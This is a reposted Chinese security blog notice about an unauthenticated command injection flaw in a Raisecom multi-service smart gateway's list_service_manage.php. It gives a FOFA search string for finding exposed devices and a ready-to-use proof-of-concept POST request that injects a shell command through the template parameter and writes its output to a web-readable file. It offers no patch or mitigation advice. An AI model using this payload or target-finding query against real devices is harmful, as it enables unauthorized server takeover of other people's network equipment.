瑞斯康达多业务智能网关 list_service_manage存在命令执行漏洞

admin 2024年9月10日08:42:42评论46 views字数 347阅读1分9秒阅读模式
漏洞描述
瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。
资产信息
FOFA:body="/images/raisecom/back.gif"

瑞斯康达多业务智能网关 list_service_manage存在命令执行漏洞

瑞斯康达多业务智能网关 list_service_manage存在命令执行漏洞
漏洞复现

瑞斯康达多业务智能网关 list_service_manage存在命令执行漏洞

瑞斯康达多业务智能网关 list_service_manage存在命令执行漏洞

POC

POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true


访问文件url+/tmp/1.txt获取命令回显

 

原文始发于微信公众号(小白菜安全):漏洞推送|某智能网关 list_service_manage存在命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月10日08:42:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   瑞斯康达多业务智能网关 list_service_manage存在命令执行漏洞http://cn-sec.com/archives/3147871.html

发表评论

匿名网友 填写信息